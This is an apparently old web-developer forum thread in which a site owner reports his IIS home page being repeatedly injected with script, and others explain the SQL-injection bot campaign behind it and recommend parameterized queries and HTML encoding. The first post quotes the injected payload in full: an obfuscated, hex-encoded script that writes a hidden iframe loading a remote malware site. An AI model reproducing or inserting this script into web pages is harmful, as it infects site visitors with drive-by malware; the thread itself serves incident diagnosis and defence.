new type of injection? rewrite default document?

[Brian Bozarth]

This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at the top or bottom of the home
page... it looks something like this:

<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
() {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
q4877d47d94d7f;} var
q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q4877d47d93974(q4877d47d9740a));</script>

What it's doing is decoding itself into an iframe that links out to popups
that will try and download a virus on your machine. I don't get the popup
in my machine because i think i have a newer version of IE. But some
people have complained that it is installing a virus on their machine.

Also what is crazy is when I replace the file with a good version. In
about 30 mins, it automatically overwritten with the infected version.
Also I've noticed it on some other websites that I haven't touched.

Has anyone encountered this before? Because I'm stumped as to the cause of
it. I don't see the issue on our dev server. It seems to be IIS on a
shared host.

Brian

 

[ThatsIT.net.au]

It would seem you have a virus on your machine that is adding the code.

this is just a thought I don't know it it will work, but try auditing access
to the file. maybe then you can at least see what user the virus is running
under. look in your task manager for processes running

 

[Bob Barrows [MVP]]

This is weird, I'm pretty familiar with SQL Injection - but we're
getting these weird injection that is writing in the default document or
home
page. What it's doing is putting in script code at the top or bottom of
the
home page... it looks something like this:

Browse through the several threads about sql injection that have been posted
in the last couple weeks. You should find posts that mention these links:

http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984
http://isc.sans.org/diary.html?n&storyid=4294
http://blogs.technet.com/neilcar/ar...-of-a-sql-injection-incident-part-2-meat.aspx

In a nutshell, you've been attacked by a bot that uses google to find sites
that might be vulnerable to sql injection, based on the use of querystrings
in the urls. It then runs through a scripted routine to find the
vulnerabilities in the sites, and if they exist, uses those vulnerabilities
to insert those script tags you are seeing into every table in your
database. Since your code is likely to be writing data tretrieved from the
database to Response without validating or encoding it, it's really your
code that is inserting the script tags into your pages.

So the first thing you should do is check the data in your database. If
corrupt, take it offline and restore a backup, or run a stored procedure
which was posted by Old Pedant to attempt to cleanse it. Then, go through
your server-side code with a fine tooth comb and

1. Make your code impervious to sql injection by eliminating all use of
dynamic sql, using parameters instead.
See here for a better, more secure way to execute your queries by using
parameter markers:
http://groups-beta.google.com/group/microsoft.public.inetserver.asp.db/msg/72e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&[email protected]

http://groups.google.com/groups?hl=...=1&[email protected]


SQL Server:

http://groups.google.com/group/microsoft.public.inetserver.asp.general/msg/5d3c9d4409dc1701?hl=en&


2. Use Server.HTMLEncode when writing data to Response